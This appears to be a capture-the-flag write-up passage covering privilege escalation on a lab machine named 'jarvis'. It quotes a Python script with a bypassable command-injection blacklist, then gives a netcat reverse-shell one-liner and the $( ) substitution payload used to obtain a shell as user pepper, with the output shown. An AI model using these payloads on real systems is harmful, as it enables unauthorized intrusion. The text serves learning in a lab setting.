7 www-data > pepper
www-data@jarvis: sudo -u pepper /var/www/Admin-Utilities/simpler.py
# there is ping function that is executed when using flag -p
simpler.py
forbidden = ['&', ';', '-', '`', '||', '|']
command = input('Enter an IP: ')
for i in forbidden:
if i in command:
print('Got you')
exit()
os.system('ping ' + command)
# tried using a custom ping; but then realized python PATH is different from sytem PATH
# as there's a forbidden list, def looks like command injection
Using https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.16.5 443' > /tmp/kashz.sh
www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es
***********************************************
Enter an IP: $(/tmp/kashz.sh)
# command is executed.
$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.143] 51808
whoami;id;hostname
pepper
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
jarvis
Last updated